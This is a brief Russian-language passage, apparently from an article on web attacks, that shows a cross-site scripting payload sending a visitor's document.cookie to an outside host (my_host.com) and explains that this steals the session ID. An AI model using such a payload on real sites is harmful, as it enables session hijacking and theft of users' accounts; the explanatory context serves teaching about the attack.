Фрагмент кода похищения ключа с идентификатором сессии (session ID):
<script> document.location="http://my_host.com.php?cookie="+document.cookie </script>
Таким образом на my_host.com будут отправлены cookie пользователя.
Изображения Видео